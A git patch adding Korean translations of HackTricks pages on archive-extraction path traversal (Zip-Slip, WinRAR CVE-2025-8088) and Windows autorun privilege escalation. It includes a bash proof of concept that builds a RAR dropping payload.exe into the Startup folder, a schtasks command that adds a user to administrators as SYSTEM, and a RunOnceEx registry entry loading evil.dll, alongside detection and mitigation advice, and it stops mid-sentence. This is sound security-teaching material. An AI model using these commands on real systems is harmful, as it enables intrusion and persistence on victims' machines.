From a27656dc41bcf821c63f9c1cc8bd8542e819da4b Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 13 Aug 2025 22:16:07 +0000 Subject: [PATCH] Translated ['src/generic-hacking/archive-extraction-path-traversal.md', --- src/SUMMARY.md | 1 + .../archive-extraction-path-traversal.md | 68 +++++++++++++++++++ ...vilege-escalation-with-autorun-binaries.md | 56 ++++++++------- 3 files changed, 102 insertions(+), 23 deletions(-) create mode 100644 src/generic-hacking/archive-extraction-path-traversal.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 68cf84961..bb1d3f659 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -79,6 +79,7 @@ # ๐Ÿง™โ€โ™‚๏ธ Generic Hacking +- [Archive Extraction Path Traversal](generic-hacking/archive-extraction-path-traversal.md) - [Brute Force - CheatSheet](generic-hacking/brute-force.md) - [Esim Javacard Exploitation](generic-hacking/esim-javacard-exploitation.md) - [Exfiltration](generic-hacking/exfiltration.md) diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md new file mode 100644 index 000000000..2ac7c1ec4 --- /dev/null +++ b/src/generic-hacking/archive-extraction-path-traversal.md @@ -0,0 +1,68 @@ +# Archive Extraction Path Traversal ("Zip-Slip" / WinRAR CVE-2025-8088) + +{{#include ../banners/hacktricks-training.md}} + +## ๊ฐœ์š” + +๋งŽ์€ ์•„์นด์ด๋ธŒ ํ˜•์‹(ZIP, RAR, TAR, 7-ZIP ๋“ฑ)์€ ๊ฐ ํ•ญ๋ชฉ์ด ์ž์ฒด **๋‚ด๋ถ€ ๊ฒฝ๋กœ**๋ฅผ ๊ฐ€์งˆ ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ถ”์ถœ ์œ ํ‹ธ๋ฆฌํ‹ฐ๊ฐ€ ๊ทธ ๊ฒฝ๋กœ๋ฅผ ๋งน๋ชฉ์ ์œผ๋กœ ์กด์ค‘ํ•  ๊ฒฝ์šฐ, `..` ๋˜๋Š” **์ ˆ๋Œ€ ๊ฒฝ๋กœ**(์˜ˆ: `C:\Windows\System32\`)๋ฅผ ํฌํ•จํ•œ ์กฐ์ž‘๋œ ํŒŒ์ผ ์ด๋ฆ„์ด ์‚ฌ์šฉ์ž๊ฐ€ ์„ ํƒํ•œ ๋””๋ ‰ํ† ๋ฆฌ ์™ธ๋ถ€์— ๊ธฐ๋ก๋ฉ๋‹ˆ๋‹ค. ์ด ์œ ํ˜•์˜ ์ทจ์•ฝ์ ์€ *Zip-Slip* ๋˜๋Š” **์•„์นด์ด๋ธŒ ์ถ”์ถœ ๊ฒฝ๋กœ ํƒ์ƒ‰**์œผ๋กœ ๋„๋ฆฌ ์•Œ๋ ค์ ธ ์žˆ์Šต๋‹ˆ๋‹ค. + +๊ฒฐ๊ณผ๋Š” ์ž„์˜์˜ ํŒŒ์ผ์„ ๋ฎ์–ด์“ฐ๋Š” ๊ฒƒ๋ถ€ํ„ฐ Windows *์‹œ์ž‘* ํด๋”์™€ ๊ฐ™์€ **์ž๋™ ์‹คํ–‰** ์œ„์น˜์— ํŽ˜์ด๋กœ๋“œ๋ฅผ ๋ฐฐ์น˜ํ•˜์—ฌ **์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰(RCE)**๋ฅผ ์ง์ ‘ ๋‹ฌ์„ฑํ•˜๋Š” ๊ฒƒ๊นŒ์ง€ ๋‹ค์–‘ํ•ฉ๋‹ˆ๋‹ค. + +## ๊ทผ๋ณธ ์›์ธ + +1. ๊ณต๊ฒฉ์ž๊ฐ€ ํ•˜๋‚˜ ์ด์ƒ์˜ ํŒŒ์ผ ํ—ค๋”์— ๋‹ค์Œ์„ ํฌํ•จํ•˜๋Š” ์•„์นด์ด๋ธŒ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค: +* ์ƒ๋Œ€ ํƒ์ƒ‰ ์‹œํ€€์Šค (`..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe`) +* ์ ˆ๋Œ€ ๊ฒฝ๋กœ (`C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe`) +2. ํ”ผํ•ด์ž๊ฐ€ ๋‚ด์žฅ๋œ ๊ฒฝ๋กœ๋ฅผ ์‹ ๋ขฐํ•˜๊ณ  ์ด๋ฅผ ์ •๋ฆฌํ•˜๊ฑฐ๋‚˜ ์„ ํƒํ•œ ๋””๋ ‰ํ† ๋ฆฌ ์•„๋ž˜๋กœ ๊ฐ•์ œ ์ถ”์ถœํ•˜์ง€ ์•Š๋Š” ์ทจ์•ฝํ•œ ๋„๊ตฌ๋กœ ์•„์นด์ด๋ธŒ๋ฅผ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค. +3. ํŒŒ์ผ์ด ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ์–ดํ•˜๋Š” ์œ„์น˜์— ๊ธฐ๋ก๋˜๊ณ  ์‹œ์Šคํ…œ์ด๋‚˜ ์‚ฌ์šฉ์ž๊ฐ€ ํ•ด๋‹น ๊ฒฝ๋กœ๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•  ๋•Œ ๋‹ค์Œ์— ์‹คํ–‰/๋กœ๋“œ๋ฉ๋‹ˆ๋‹ค. + +## ์‹ค์ œ ์‚ฌ๋ก€ โ€“ WinRAR โ‰ค 7.12 (CVE-2025-8088) + +Windows์šฉ WinRAR(`rar` / `unrar` CLI, DLL ๋ฐ ํœด๋Œ€์šฉ ์†Œ์Šค ํฌํ•จ)๋Š” ์ถ”์ถœ ์ค‘ ํŒŒ์ผ ์ด๋ฆ„์„ ๊ฒ€์ฆํ•˜์ง€ ๋ชปํ–ˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ํ•ญ๋ชฉ์„ ํฌํ•จํ•˜๋Š” ์•…์˜์ ์ธ RAR ์•„์นด์ด๋ธŒ: +```text +..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe +``` +๊ฒฐ๊ณผ์ ์œผ๋กœ **์„ ํƒ๋œ** ์ถœ๋ ฅ ๋””๋ ‰ํ† ๋ฆฌ ์™ธ๋ถ€์— ์œ„์น˜ํ•˜๊ฒŒ ๋˜๊ณ  ์‚ฌ์šฉ์ž์˜ *Startup* ํด๋” ์•ˆ์— ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. Windows๋Š” ๋กœ๊ทธ์˜จ ํ›„ ๊ทธ๊ณณ์— ์žˆ๋Š” ๋ชจ๋“  ๊ฒƒ์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•˜์—ฌ *์ง€์†์ ์ธ* RCE๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. + +### PoC ์•„์นด์ด๋ธŒ ๋งŒ๋“ค๊ธฐ (Linux/Mac) +```bash +# Requires rar >= 6.x +mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup" +cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/" +rar a -ep evil.rar evil/* +``` +์˜ต์…˜ ์‚ฌ์šฉ: +* `-ep` โ€“ ํŒŒ์ผ ๊ฒฝ๋กœ๋ฅผ ์ฃผ์–ด์ง„ ๋Œ€๋กœ ์ •ํ™•ํ•˜๊ฒŒ ์ €์žฅ (์„ ํ–‰ `./`๋ฅผ **์ œ๊ฑฐํ•˜์ง€ ์•Š์Œ**). + +ํ”ผํ•ด์ž์—๊ฒŒ `evil.rar`๋ฅผ ์ „๋‹ฌํ•˜๊ณ  ์ทจ์•ฝํ•œ WinRAR ๋นŒ๋“œ๋กœ ์ถ”์ถœํ•˜๋„๋ก ์ง€์‹œํ•ฉ๋‹ˆ๋‹ค. + +### ์‹ค์ œ ๊ด€์ฐฐ๋œ ์•…์šฉ ์‚ฌ๋ก€ + +ESET๋Š” CVE-2025-8088์„ ์•…์šฉํ•˜์—ฌ ๋งž์ถคํ˜• ๋ฐฑ๋„์–ด๋ฅผ ๋ฐฐํฌํ•˜๊ณ  ๋žœ์„ฌ์›จ์–ด ์ž‘์—…์„ ์ด‰์ง„ํ•˜๋Š” RAR ์•„์นด์ด๋ธŒ๋ฅผ ์ฒจ๋ถ€ํ•œ RomCom (Storm-0978/UNC2596) ์Šคํ”ผ์–ด ํ”ผ์‹ฑ ์บ ํŽ˜์ธ์„ ๋ณด๊ณ ํ–ˆ์Šต๋‹ˆ๋‹ค. + +## ํƒ์ง€ ํŒ + +* **์ •์  ๊ฒ€์‚ฌ** โ€“ ์•„์นด์ด๋ธŒ ํ•ญ๋ชฉ์„ ๋‚˜์—ดํ•˜๊ณ  `../`, `..\\`, *์ ˆ๋Œ€ ๊ฒฝ๋กœ* (`C:`) ๋˜๋Š” ๋น„์ •๊ทœ UTF-8/UTF-16 ์ธ์ฝ”๋”ฉ์ด ํฌํ•จ๋œ ์ด๋ฆ„์„ ํ”Œ๋ž˜๊ทธํ•ฉ๋‹ˆ๋‹ค. +* **์ƒŒ๋“œ๋ฐ•์Šค ์ถ”์ถœ** โ€“ *์•ˆ์ „ํ•œ* ์ถ”์ถœ๊ธฐ(์˜ˆ: Python์˜ `patool`, 7-Zip โ‰ฅ ์ตœ์‹ , `bsdtar`)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ผํšŒ์šฉ ๋””๋ ‰ํ† ๋ฆฌ์— ์••์ถ•์„ ํ’€๊ณ  ๊ฒฐ๊ณผ ๊ฒฝ๋กœ๊ฐ€ ๋””๋ ‰ํ† ๋ฆฌ ๋‚ด์— ์žˆ๋Š”์ง€ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค. +* **์—”๋“œํฌ์ธํŠธ ๋ชจ๋‹ˆํ„ฐ๋ง** โ€“ WinRAR/7-Zip/etc.๋กœ ์•„์นด์ด๋ธŒ๊ฐ€ ์—ด๋ฆฐ ์งํ›„ `Startup`/`Run` ์œ„์น˜์— ์ƒˆ ์‹คํ–‰ ํŒŒ์ผ์ด ์ž‘์„ฑ๋˜๋ฉด ๊ฒฝ๊ณ ํ•ฉ๋‹ˆ๋‹ค. + +## ์™„ํ™” ๋ฐ ๊ฐ•ํ™” + +1. **์ถ”์ถœ๊ธฐ ์—…๋ฐ์ดํŠธ** โ€“ WinRAR 7.13์€ ์ ์ ˆํ•œ ๊ฒฝ๋กœ ์ •๋ฆฌ๋ฅผ ๊ตฌํ˜„ํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ์ž๋Š” WinRAR์— ์ž๋™ ์—…๋ฐ์ดํŠธ ๋ฉ”์ปค๋‹ˆ์ฆ˜์ด ์—†๊ธฐ ๋•Œ๋ฌธ์— ์ˆ˜๋™์œผ๋กœ ๋‹ค์šด๋กœ๋“œํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. +2. ๊ฐ€๋Šฅํ•  ๊ฒฝ์šฐ **โ€œ๊ฒฝ๋กœ ๋ฌด์‹œโ€** ์˜ต์…˜์œผ๋กœ ์•„์นด์ด๋ธŒ๋ฅผ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค (WinRAR: *์ถ”์ถœ โ†’ "๊ฒฝ๋กœ๋ฅผ ์ถ”์ถœํ•˜์ง€ ์•Š์Œ"*). +3. ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ์•„์นด์ด๋ธŒ๋Š” **์ƒŒ๋“œ๋ฐ•์Šค** ๋˜๋Š” VM ๋‚ด์—์„œ ์—ฝ๋‹ˆ๋‹ค. +4. ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ํ™”์ดํŠธ๋ฆฌ์ŠคํŠธ๋ฅผ ๊ตฌํ˜„ํ•˜๊ณ  ์‚ฌ์šฉ์ž ์“ฐ๊ธฐ ์•ก์„ธ์Šค๋ฅผ ์ž๋™ ์‹คํ–‰ ๋””๋ ‰ํ† ๋ฆฌ๋กœ ์ œํ•œํ•ฉ๋‹ˆ๋‹ค. + +## ์ถ”๊ฐ€ ์˜ํ–ฅ์„ ๋ฐ›์€ / ์—ญ์‚ฌ์  ์‚ฌ๋ก€ + +* 2018 โ€“ ๋งŽ์€ Java/Go/JS ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์— ์˜ํ–ฅ์„ ๋ฏธ์นœ Snyk์˜ ๋Œ€๊ทœ๋ชจ *Zip-Slip* ๊ถŒ๊ณ . +* 2023 โ€“ `-ao` ๋ณ‘ํ•ฉ ์ค‘ ์œ ์‚ฌํ•œ ํƒ์ƒ‰์„ ๊ฐ€์ง„ 7-Zip CVE-2023-4011. +* ์“ฐ๊ธฐ ์ „์— `PathCanonicalize` / `realpath`๋ฅผ ํ˜ธ์ถœํ•˜์ง€ ์•Š๋Š” ๋ชจ๋“  ์‚ฌ์šฉ์ž ์ •์˜ ์ถ”์ถœ ๋…ผ๋ฆฌ. + +## ์ฐธ์กฐ + +- [BleepingComputer โ€“ WinRAR ์ œ๋กœ๋ฐ์ด ์•…์šฉ์œผ๋กœ ์•„์นด์ด๋ธŒ ์ถ”์ถœ ์‹œ ์•…์„ฑ์ฝ”๋“œ ์‹ฌ๊ธฐ](https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/) +- [WinRAR 7.13 ๋ณ€๊ฒฝ ๋กœ๊ทธ](https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=283&cHash=a64b4a8f662d3639dec8d65f47bc93c5) +- [Snyk โ€“ Zip Slip ์ทจ์•ฝ์  ๋ณด๊ณ ์„œ](https://snyk.io/research/zip-slip-vulnerability) + +{{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md index d9c2b968d..1ef13e736 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md +++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md @@ -1,7 +1,9 @@ -# Autoruns๋ฅผ ์ด์šฉํ•œ ๊ถŒํ•œ ์ƒ์Šน +# Autoruns๋ฅผ ํ†ตํ•œ ๊ถŒํ•œ ์ƒ์Šน {{#include ../../banners/hacktricks-training.md}} + + ## WMIC **Wmic**๋Š” **์‹œ์ž‘** ์‹œ ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์‹œ์ž‘ ์‹œ ์‹คํ–‰๋˜๋„๋ก ํ”„๋กœ๊ทธ๋ž˜๋ฐ๋œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ํ™•์ธํ•˜๋ ค๋ฉด: @@ -11,7 +13,7 @@ Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl ``` ## Scheduled Tasks -**์ž‘์—…**์€ **ํŠน์ • ๋นˆ๋„**๋กœ ์‹คํ–‰๋˜๋„๋ก ์˜ˆ์•ฝํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์‹คํ–‰๋˜๋„๋ก ์˜ˆ์•ฝ๋œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋ณด๋ ค๋ฉด: +**์ž‘์—…**์€ **ํŠน์ • ๋นˆ๋„**๋กœ ์‹คํ–‰๋˜๋„๋ก ์˜ˆ์•ฝํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ ๋ช…๋ น์–ด๋กœ ์‹คํ–‰๋˜๋„๋ก ์˜ˆ์•ฝ๋œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ํ™•์ธํ•˜์„ธ์š”: ```bash schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab" schtasks /query /fo LIST 2>nul | findstr TaskName @@ -22,9 +24,9 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas #You can also write that content on a bat file that is being executed by a scheduled task schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add" ``` -## ํด๋” +## Folders -**์‹œ์ž‘ ํด๋”์— ์œ„์น˜ํ•œ ๋ชจ๋“  ๋ฐ”์ด๋„ˆ๋ฆฌ๋Š” ์‹œ์ž‘ ์‹œ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค**. ์ผ๋ฐ˜์ ์ธ ์‹œ์ž‘ ํด๋”๋Š” ๋‹ค์Œ์— ๋‚˜์—ด๋œ ํด๋”๋“ค์ด์ง€๋งŒ, ์‹œ์ž‘ ํด๋”๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. [์—ฌ๊ธฐ๋ฅผ ์ฝ์–ด ์–ด๋””์ธ์ง€ ์•Œ์•„๋ณด์„ธ์š”.](privilege-escalation-with-autorun-binaries.md#startup-path) +๋ชจ๋“  **์‹œ์ž‘ ํด๋”์— ์œ„์น˜ํ•œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋“ค์€ ์‹œ์ž‘ ์‹œ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค**. ์ผ๋ฐ˜์ ์ธ ์‹œ์ž‘ ํด๋”๋Š” ๋‹ค์Œ์— ๋‚˜์—ด๋œ ํด๋”๋“ค์ด์ง€๋งŒ, ์‹œ์ž‘ ํด๋”๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. [์—ฌ๊ธฐ๋ฅผ ์ฝ์–ด ์–ด๋””์ธ์ง€ ์•Œ์•„๋ณด์„ธ์š”.](privilege-escalation-with-autorun-binaries.md#startup-path) ```bash dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul @@ -33,10 +35,18 @@ dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" ``` +> **์ฐธ๊ณ **: ์•„์นด์ด๋ธŒ ์ถ”์ถœ *๊ฒฝ๋กœ ํƒ์ƒ‰* ์ทจ์•ฝ์ (์˜ˆ: WinRAR์—์„œ 7.13 ์ด์ „์— ์•…์šฉ๋œ CVE-2025-8088)์€ **์••์ถ• ํ•ด์ œ ์ค‘ ์ด๋Ÿฌํ•œ ์‹œ์ž‘ ํด๋”์— ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ง์ ‘ ๋ฐฐ์น˜ํ•˜๋Š” ๋ฐ ํ™œ์šฉ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ**, ๋‹ค์Œ ์‚ฌ์šฉ์ž ๋กœ๊ทธ์˜จ ์‹œ ์ฝ”๋“œ ์‹คํ–‰์„ ์ดˆ๋ž˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ธฐ์ˆ ์— ๋Œ€ํ•œ ์‹ฌ์ธต ๋ถ„์„์€ ๋‹ค์Œ์„ ์ฐธ์กฐํ•˜์‹ญ์‹œ์˜ค: + +{{#ref}} +../../generic-hacking/archive-extraction-path-traversal.md +{{#endref}} + + + ## ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ -> [!NOTE] -> [์—ฌ๊ธฐ์—์„œ ๋…ธํŠธ](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•ญ๋ชฉ์€ 64๋น„ํŠธ Windows ๋ฒ„์ „์„ ์‹คํ–‰ํ•˜๊ณ  ์žˆ์Œ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์šด์˜ ์ฒด์ œ๋Š” ์ด ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ 64๋น„ํŠธ Windows ๋ฒ„์ „์—์„œ ์‹คํ–‰๋˜๋Š” 32๋น„ํŠธ ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ์— ๋Œ€ํ•œ HKEY_LOCAL_MACHINE\SOFTWARE์˜ ๋ณ„๋„ ๋ณด๊ธฐ๋ฅผ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. +> [!TIP] +> [์—ฌ๊ธฐ์—์„œ ์ฐธ๊ณ ](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•ญ๋ชฉ์€ 64๋น„ํŠธ Windows ๋ฒ„์ „์„ ์‹คํ–‰ํ•˜๊ณ  ์žˆ์Œ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์šด์˜ ์ฒด์ œ๋Š” ์ด ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ 64๋น„ํŠธ Windows ๋ฒ„์ „์—์„œ ์‹คํ–‰๋˜๋Š” 32๋น„ํŠธ ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ์— ๋Œ€ํ•œ HKEY_LOCAL_MACHINE\SOFTWARE์˜ ๋ณ„๋„ ๋ณด๊ธฐ๋ฅผ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. ### ์‹คํ–‰ @@ -72,14 +82,14 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" - `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx` - `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx` -Windows Vista ๋ฐ ์ดํ›„ ๋ฒ„์ „์—์„œ๋Š” **Run** ๋ฐ **RunOnce** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๊ฐ€ ์ž๋™์œผ๋กœ ์ƒ์„ฑ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ‚ค์˜ ํ•ญ๋ชฉ์€ ํ”„๋กœ๊ทธ๋žจ์„ ์ง์ ‘ ์‹œ์ž‘ํ•˜๊ฑฐ๋‚˜ ์ข…์†์„ฑ์œผ๋กœ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ๋กœ๊ทธ์ธ ์‹œ DLL ํŒŒ์ผ์„ ๋กœ๋“œํ•˜๋ ค๋ฉด **RunOnceEx** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์™€ "Depend" ํ‚ค๋ฅผ ํ•จ๊ป˜ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‹œ์Šคํ…œ ์‹œ์ž‘ ์‹œ "C:\temp\evil.dll"์„ ์‹คํ–‰ํ•˜๋„๋ก ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•ญ๋ชฉ์„ ์ถ”๊ฐ€ํ•˜์—ฌ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค: +Windows Vista ๋ฐ ์ดํ›„ ๋ฒ„์ „์—์„œ๋Š” **Run** ๋ฐ **RunOnce** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๊ฐ€ ์ž๋™์œผ๋กœ ์ƒ์„ฑ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ‚ค์˜ ํ•ญ๋ชฉ์€ ํ”„๋กœ๊ทธ๋žจ์„ ์ง์ ‘ ์‹œ์ž‘ํ•˜๊ฑฐ๋‚˜ ์ข…์†์„ฑ์œผ๋กœ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ๋กœ๊ทธ์˜จ ์‹œ DLL ํŒŒ์ผ์„ ๋กœ๋“œํ•˜๋ ค๋ฉด **RunOnceEx** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์™€ ํ•จ๊ป˜ "Depend" ํ‚ค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‹œ์Šคํ…œ ์‹œ์ž‘ ์‹œ "C:\temp\evil.dll"์„ ์‹คํ–‰ํ•˜๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•ญ๋ชฉ์„ ์ถ”๊ฐ€ํ•˜์—ฌ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค: ``` reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll" ``` -> [!NOTE] +> [!TIP] > **Exploit 1**: **HKLM** ๋‚ด์˜ ์–ธ๊ธ‰๋œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์ค‘ ์–ด๋А ๊ณณ์—๋“  ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์ธํ•  ๋•Œ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -> [!NOTE] +> [!TIP] > **Exploit 2**: **HKLM** ๋‚ด์˜ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์ค‘ ์–ด๋А ๊ณณ์—๋“  ํ‘œ์‹œ๋œ ์ด์ง„ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์ธํ•  ๋•Œ ํ•ด๋‹น ์ด์ง„ ํŒŒ์ผ์„ ๋ฐฑ๋„์–ด๋กœ ์ˆ˜์ •ํ•˜๊ณ  ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ```bash #CMD @@ -145,8 +155,8 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\Ru **์‹œ์ž‘** ํด๋”์— ๋ฐฐ์น˜๋œ ๋ฐ”๋กœ ๊ฐ€๊ธฐ๋Š” ์‚ฌ์šฉ์ž ๋กœ๊ทธ์˜จ ๋˜๋Š” ์‹œ์Šคํ…œ ์žฌ๋ถ€ํŒ… ์ค‘์— ์„œ๋น„์Šค๋‚˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค. **์‹œ์ž‘** ํด๋”์˜ ์œ„์น˜๋Š” **๋กœ์ปฌ ๋จธ์‹ ** ๋ฐ **ํ˜„์žฌ ์‚ฌ์šฉ์ž** ๋ฒ”์œ„์— ๋Œ€ํ•ด ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—์„œ ์ •์˜๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ด๋Ÿฌํ•œ ์ง€์ •๋œ **์‹œ์ž‘** ์œ„์น˜์— ์ถ”๊ฐ€๋œ ๋ชจ๋“  ๋ฐ”๋กœ ๊ฐ€๊ธฐ๊ฐ€ ๋กœ๊ทธ์˜จ ๋˜๋Š” ์žฌ๋ถ€ํŒ… ํ”„๋กœ์„ธ์Šค ํ›„์— ์—ฐ๊ฒฐ๋œ ์„œ๋น„์Šค๋‚˜ ํ”„๋กœ๊ทธ๋žจ์ด ์‹œ์ž‘๋˜๋„๋ก ๋ณด์žฅํ•จ์„ ์˜๋ฏธํ•˜๋ฉฐ, ํ”„๋กœ๊ทธ๋žจ์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•˜๋„๋ก ์˜ˆ์•ฝํ•˜๋Š” ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. -> [!NOTE] -> **HKLM** ์•„๋ž˜์˜ \[User] Shell Folder๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์ด๋ฅผ ๋‹น์‹ ์ด ์ œ์–ดํ•˜๋Š” ํด๋”๋กœ ์ง€์ •ํ•˜๊ณ  ์‚ฌ์šฉ์ž๊ฐ€ ์‹œ์Šคํ…œ์— ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค ์‹คํ–‰๋˜๋Š” ๋ฐฑ๋„์–ด๋ฅผ ๋ฐฐ์น˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +> [!TIP] +> **HKLM** ์•„๋ž˜์˜ ์–ด๋–ค \[User] Shell Folder๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๋‹น์‹ ์ด ์ œ์–ดํ•˜๋Š” ํด๋”๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋„๋ก ์„ค์ •ํ•  ์ˆ˜ 